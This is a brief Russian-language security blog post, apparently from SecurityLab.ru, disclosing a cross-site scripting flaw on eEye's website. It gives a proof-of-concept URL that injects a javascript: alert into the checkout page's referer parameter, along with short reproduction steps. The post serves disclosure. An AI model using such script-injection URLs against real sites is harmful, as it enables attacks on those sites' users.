XSS на eEye.com

Security
XSS на eEye.com
Компания eEye утверждает что на их сайте не было XSS. Собственно, а что следовало ожидать от компании, которая не способна защитить свой web стайт?

Example:
Follow the link and press the "Back" button.

www.eeye.com//~apps/shop/checkout.asp?referer=javascript: alert('www.securitylab.ru')&rnd=060816.123112.125229.323
Security
Alt text
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.

БОГ — ЭТО ПРОСТО БАГ?

Наука считает, что вера — это побочный эффект защиты от хищников. Мозгу проще придумать "Смотрящего", чем признать хаос. Жесткий разбор того, как из страха быть съеденным родились мировые религии.

Взглянуть фактам в лицо

article-title

Валерий Марчук

Блог посвящен безопасности и жизни секлаба